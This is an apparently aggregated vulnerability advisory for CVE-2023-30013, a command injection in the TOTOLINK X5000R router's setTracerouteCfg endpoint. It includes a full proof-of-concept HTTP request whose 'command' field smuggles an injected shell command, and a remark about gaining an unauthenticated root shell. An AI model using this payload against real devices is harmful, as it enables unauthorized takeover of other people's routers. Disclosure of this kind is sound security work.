Headline

CVE-2023-30013: vuln/TOTOLINK/X5000R/2 at main · Kazamayc/vuln

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the “command” parameter.

1 year ago

CVE

Open in Source

#vulnerability #ubuntu #linux #js #java #acer #auth #firefox

TOTOLINK X5000R (V9.1.0u.6369_B20230113)was found to contain a command insertion vulnerability in setting/setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the “command” parameter.

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.3.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Origin: http://192.168.3.2
Connection: close
Referer: http://192.168.3.2/advance/traceroute.html?time=1679125513355
Cookie: SESSION_ID=2:1679122532:2

{"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}

Finally, you can write exp to get a stable root shell without authorization.

Multiple TOTOLINK network products contain a command injection vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the command parameter. After exploitation, an attacker will have full access with the same user privileges under which the webserver is running - which is typically root.

1 year ago

Packet Storm

Open in Source

#vulnerability #web #linux #git #rce #acer #auth #ssl